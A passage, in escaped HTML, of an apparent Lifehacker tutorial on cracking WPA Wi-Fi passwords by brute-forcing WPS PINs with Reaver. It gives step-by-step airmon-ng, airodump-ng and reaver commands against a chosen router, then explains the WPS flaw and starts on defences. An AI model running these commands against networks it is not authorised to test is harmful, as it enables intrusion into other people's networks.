To boot into BackTrack, just put the DVD in your drive and boot your machine from the disc. (Google around if you don&#39;t know anything about live CDs/DVDs and need help with this part.) During the boot process, BackTrack will prompt you to to choose the boot mode. Select &quot;BackTrack Text - Default Boot Text Mode&quot; and press Enter.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;286726933b25345ca711f5e2f10c9019&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Eventually BackTrack will boot to a command line prompt. When you&#39;ve reached the prompt, type&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;startx&lt;/code&gt;and press Enter. BackTrack will boot into its graphical interface.&lt;/div&gt;
&lt;h4 data-textannotation-id=&quot;fda5a08ba98998b07b6d23251fe86df5&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 21px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
Step 2: Install Reaver&lt;/h4&gt;
&lt;div data-textannotation-id=&quot;f582f30eefe904cad0bee213be90ab8e&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Reaver has been added to the bleeding edge version of BackTrack, but it&#39;s not yet incorporated with the live DVD, so as of this writing, you need to install Reaver before proceeding. (Eventually, Reaver will simply be incorporated with BackTrack by default.) To install Reaver, you&#39;ll first need to connect to a Wi-Fi network that you have the password to.&lt;/div&gt;
&lt;ol style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; counter-reset: item 0; direction: ltr; font-family: Georgia, serif; font-size: 16px; line-height: 25px; list-style-position: inside; list-style-type: none; margin: 0px 0px 19px; max-width: 100%; padding: 0px 18px; position: relative;&quot;&gt;
&lt;li data-textannotation-id=&quot;9d6bfdc6c9f03710c4ba3e1fa207e90a&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;Click Applications &amp;gt; Internet &amp;gt; Wicd Network Manager&lt;/li&gt;
&lt;li data-textannotation-id=&quot;668ff97a9e4b412fe88587ab47f0a0b5&quot; style=&quot;box-sizing: border-box; direction: ltr; font-size: 15px; margin: 0px 0px 6px; padding: 0px 0px 0px 35px;&quot;&gt;Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.&lt;/li&gt;
&lt;/ol&gt;
&lt;div data-textannotation-id=&quot;64dbfd8fb8fef557366ff8c4081d5764&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Now that you&#39;re online, let&#39;s install Reaver. Click the Terminal button in the menu bar (or click Applications &amp;gt; Accessories &amp;gt; Terminal). At the prompt, type:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;331af5c21044d8f7b8ace076c3d6bbd8&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;apt-get update
&lt;/pre&gt;
&lt;div data-textannotation-id=&quot;0e0af5afe0a4ea851a821f28b040aa62&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
And then, after the update completes:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;4641d03a6395c569762433914b21fb86&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;apt-get install reaver
&lt;/pre&gt;
&lt;div class=&quot;has-media media-300&quot; data-textannotation-id=&quot;7c8b4da00daa42b4aa15bcef4cf82061&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; float: left; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-right: 18px; margin-top: 5px; max-width: 100%; padding: 0px 18px; width: 336px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-original&quot; height=&quot;158&quot; src=&quot;http://img.gawkerassets.com/img/18fblipptotlbjpg/original.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; max-width: 100%; width: 300px;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div data-textannotation-id=&quot;64848a231cd08f519bb2c252cd6b5f04&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
If all went well, Reaver should now be installed. It may seem a little lame that you need to connect to a network to do this, but it will remain installed until you reboot your computer. At this point, go ahead and disconnect from the network by opening Wicd Network Manager again and clicking Disconnect. (You may not strictly need to do this. I did just because it felt like I was somehow cheating if I were already connected to a network.)&lt;/div&gt;
&lt;h4 data-textannotation-id=&quot;3cb36f2401fc2c9b71d8a2c79f6c70ec&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 21px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
Step 3: Gather Your Device Information, Prep Your Crackin&#39;&lt;/h4&gt;
&lt;div data-textannotation-id=&quot;a624e14d67b9a342838b1645138cae08&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
In order to use Reaver, you need to get your wireless card&#39;s interface name, the BSSID of the router you&#39;re attempting to crack (the BSSID is a unique series of letters and numbers that identifies a router), and you need to make sure your wireless card is in monitor mode. So let&#39;s do all that.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;727376804e9bd583e7991ca46997af5e&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Find your wireless card:&lt;/strong&gt;&amp;nbsp;Inside Terminal, type:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;942271e0310ab5038d9077e917554b57&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;iwconfig
&lt;/pre&gt;
&lt;div class=&quot;has-media media-300&quot; data-textannotation-id=&quot;a74304d6ccc474b5e4f4eeb51c44047f&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; float: left; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-right: 18px; margin-top: 5px; max-width: 100%; padding: 0px 18px; width: 336px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-original&quot; height=&quot;205&quot; src=&quot;http://img.gawkerassets.com/img/18fblipq07ossjpg/original.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; max-width: 100%; width: 300px;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div data-textannotation-id=&quot;fd87776d6bcf4bd230648aec82d43c24&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Press Enter. You should see a wireless device in the subsequent list. Most likely, it&#39;ll be named&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;wlan0&lt;/code&gt;, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;88e6ceb88a20be8d752f24dbe7b4659a&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Put your wireless card into monitor mode:&lt;/strong&gt;&amp;nbsp;Assuming your wireless card&#39;s interface name&lt;em style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;is&lt;/em&gt;&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;wlan0&lt;/code&gt;, execute the following command to put your wireless card into monitor mode:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;3d495b7e68fad49ae982623ec549bdbd&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;airmon-ng start wlan0
&lt;/pre&gt;
&lt;div data-textannotation-id=&quot;3c758f33c03f4f4e6045215b5c70ab1e&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
This command will output the name of monitor mode interface, which you&#39;ll also want to make note of. Most likely, it&#39;ll be&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;mon0&lt;/code&gt;, like in the screenshot below. Make note of that.&lt;/div&gt;
&lt;div class=&quot;has-media media-300&quot; data-textannotation-id=&quot;18ee593fd733494d83a40147d98140a1&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; float: left; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-right: 18px; margin-top: 5px; max-width: 100%; padding: 0px 18px; width: 336px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-ku-medium&quot; height=&quot;190&quot; src=&quot;http://img.gawkerassets.com/img/18qpo7omogao2jpg/ku-medium.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; max-width: 100%; width: 300px;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div data-textannotation-id=&quot;5a37d8a113273cf7f063c1cd1c13d170&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Find the BSSID of the router you want to crack:&lt;/strong&gt;&amp;nbsp;Lastly, you need to get the unique identifier of the router you&#39;re attempting to crack so that you can point Reaver in the right direction. To do this, execute the following command:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;b0c65846326e9be271b078025e20e371&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;airodump-ng wlan0
&lt;/pre&gt;
&lt;div data-textannotation-id=&quot;090c9b7ff4b4f23f3871928c131c44fc&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
(Note: If&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;airodump-ng wlan0&lt;/code&gt;doesn&#39;t work for you, you may want to try the monitor interface instead—e.g.,&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;airodump-ng mon0&lt;/code&gt;.)&lt;/div&gt;
&lt;div data-textannotation-id=&quot;485d92da67eeb3faaec29023b455bcd0&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
You&#39;ll see a list of the wireless networks in range—it&#39;ll look something like the screenshot below:&lt;/div&gt;
&lt;div class=&quot;has-media media-300&quot; data-textannotation-id=&quot;c3638ea757b2b534ab07e29d7d35742b&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; float: left; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-right: 18px; margin-top: 5px; max-width: 100%; padding: 0px 18px; width: 336px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-ku-medium&quot; height=&quot;109&quot; src=&quot;http://img.gawkerassets.com/img/18qpo7omjjvqzjpg/ku-medium.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; max-width: 100%; width: 300px;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;inset_placeholder&quot; id=&quot;inset_placeholder_5305094&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 16px; line-height: 25px; margin: 0px; max-width: 100%; padding: 0px 18px;&quot;&gt;
&lt;/div&gt;
&lt;div data-textannotation-id=&quot;f179b5f88082bc40b0dd76734ad98c1b&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
When you see the network you want, press Ctrl+C to stop the list from refreshing, then copy that network&#39;s BSSID (it&#39;s the series of letters, numbers, and colons on the far left). The network should have WPA or WPA2 listed under the ENC column. (If it&#39;s WEP, use our&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;previous guide to cracking WEP passwords&lt;/span&gt;&lt;/span&gt;.)&lt;/div&gt;
&lt;div data-textannotation-id=&quot;f7e21a2631e2fbc5dd027d4db48d1664&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Now, with the BSSID and monitor interface name in hand, you&#39;ve got everything you need to start up Reaver.&lt;/div&gt;
&lt;h4 data-textannotation-id=&quot;0b9865155c352d8a1ccfad3b2d9b0614&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 21px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
Step 4: Crack a Network&#39;s WPA Password with Reaver&lt;/h4&gt;
&lt;div data-textannotation-id=&quot;e5e15f6727c052f8ab22b76823701d01&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Now execute the following command in the Terminal, replacing&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;bssid&lt;/code&gt;and&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;moninterface&lt;/code&gt;with the BSSID and monitor interface and you copied down above:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;5a10adcb2544e279dcbcd2ee90f0045f&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;reaver -i &lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;moninterface&lt;/strong&gt; -b &lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;bssid&lt;/strong&gt; -vv
&lt;/pre&gt;
&lt;div data-textannotation-id=&quot;c39a108031fefc20eb00268931f3e60f&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
For example, if your monitor interface was&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;mon0&lt;/code&gt;like mine, and your BSSID was&lt;code style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; display: block; font-family: courier; font-size: 14px; line-height: 1.6; margin: 10px 0px 19px 18px; overflow: auto; padding: 16px 35px 20px; white-space: pre; width: 604.1875px; word-break: break-all;&quot;&gt;8D:AE:9D:65:1F:B2&lt;/code&gt;(a BSSID I just made up), your command would look like:&lt;/div&gt;
&lt;pre data-textannotation-id=&quot;b6f61ce873f92475b1daa3644d7b9f52&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; background-color: #666666; box-shadow: rgba(0, 0, 0, 0.498039) 0px 0px 5px 0px inset; box-sizing: border-box; color: #dddddd; direction: ltr; font-family: courier; font-size: 14px; line-height: 1.6; margin-bottom: 19px; margin-left: 18px; margin-top: 10px; max-width: 100%; overflow: auto; padding: 16px 35px 20px; width: 638.390625px; word-break: break-all;&quot;&gt;reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
&lt;/pre&gt;
&lt;div data-textannotation-id=&quot;7ba0ec82170e77bcc99002044b8e23b6&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Press Enter, sit back, and let Reaver work its disturbing magic. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my successful test, Reaver took 2 hours and 30 minutes to crack the network and deliver me with the correct password. As mentioned above, the Reaver documentation says it can take between 4 and 10 hours, so it could take more or less time than I experienced, depending. When Reaver&#39;s cracking has completed, it&#39;ll look like this:&lt;/div&gt;
&lt;div class=&quot;has-media media-300&quot; data-textannotation-id=&quot;4263fa24e95c3df4889023599d44fe8e&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; float: left; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-right: 18px; margin-top: 5px; max-width: 100%; padding: 0px 18px; width: 336px; word-break: break-word;&quot;&gt;
&lt;span class=&quot;img-border&quot; style=&quot;box-sizing: border-box; clear: both; display: inline-block; margin-bottom: 10px; position: relative;&quot;&gt;&lt;img alt=&quot;How to Crack a Wi-Fi Network&#39;s WPA Password with Reaver&quot; class=&quot;transform-ku-medium&quot; height=&quot;167&quot; src=&quot;http://img.gawkerassets.com/img/18qpo7omnvkbejpg/ku-medium.jpg&quot; style=&quot;box-sizing: border-box; display: block; height: auto; max-width: 100%; width: 300px;&quot; width=&quot;300&quot; /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div data-textannotation-id=&quot;4f85048662e5f66678382518a48a77c2&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
&lt;strong style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;A few important factors to consider:&lt;/strong&gt;Reaver worked exactly as advertised in my test, but it won&#39;t necessarily work on all routers (see more below). Also, the router you&#39;re cracking needs to have a relatively strong signal, so if you&#39;re hardly in range of a router, you&#39;ll likely experience problems, and Reaver may not work. Throughout the process, Reaver would sometimes experience a timeout, sometimes get locked in a loop trying the same PIN repeatedly, and so on. I just let it keep on running, and kept it close to the router, and eventually it worked its way through.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;7c22a1d931438a7393314ec83d9a4266&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Also of note, you can also pause your progress at any time by pressing Ctrl+C while Reaver is running. This will quit the process, but Reaver will save any progress so that next time you run the command, you can pick up where you left off-as long as you don&#39;t shut down your computer (which, if you&#39;re running off a live DVD, will reset everything).&lt;/div&gt;
&lt;h3 data-textannotation-id=&quot;2bb6c62c16a703fac26d5af125c33ad1&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 25px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
How Reaver Works&lt;/h3&gt;
&lt;div data-textannotation-id=&quot;27dc41df62f1e8484bcffa25b06d1dfb&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Now that you&#39;ve seen how to use Reaver, let&#39;s take a quick overview of how Reaver works. The tool takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It&#39;s a feature that exists on many routers, intended to provide an easy setup process, and it&#39;s tied to a PIN that&#39;s hard-coded into the device. Reaver exploits a flaw in these PINs; the result is that, with enough time, it can reveal your WPA or WPA2 password.&lt;/div&gt;
&lt;div data-textannotation-id=&quot;4e2d0552e2482b8646ca3821225d6e12&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Read more details about the vulnerability at&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;Sean Gallagher&#39;s excellent post on Ars Technica&lt;/span&gt;&lt;/span&gt;.&lt;/div&gt;
&lt;h3 data-textannotation-id=&quot;6223616e5e3f5dfaf61c518a33a68a95&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; direction: ltr; font-family: ProximaNovaCond, serif; font-size: 25px; line-height: 1.1; margin: 16px 0px; max-width: 100%; padding: 0px 18px; text-rendering: optimizelegibility;&quot;&gt;
How to Protect Yourself Against Reaver Attacks&lt;/h3&gt;
&lt;div data-textannotation-id=&quot;fe631ad0c0ab4ea9acdbc7b1604615b8&quot; style=&quot;background-color: whitesmoke; box-sizing: border-box; color: #222222; direction: ltr; font-family: Georgia, serif; font-size: 15px; line-height: 1.6; margin-bottom: 19px; max-width: 100%; padding: 0px 18px; word-break: break-word;&quot;&gt;
Since the vulnerability lies in the implementation of WPS, your network should be safe if you can simply turn off WPS (or, even better, if your router doesn&#39;t support it in the first place). Unfortunately, as Gallagher&amp;nbsp;&lt;span style=&quot;color: #709602;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; line-height: inherit;&quot;&gt;points out as Ars&lt;/span&gt;&lt;/span&gt;, even with WPS manually turned off through his router&#39;s settings, Reaver was still able to crack his password.&lt;/div&gt;
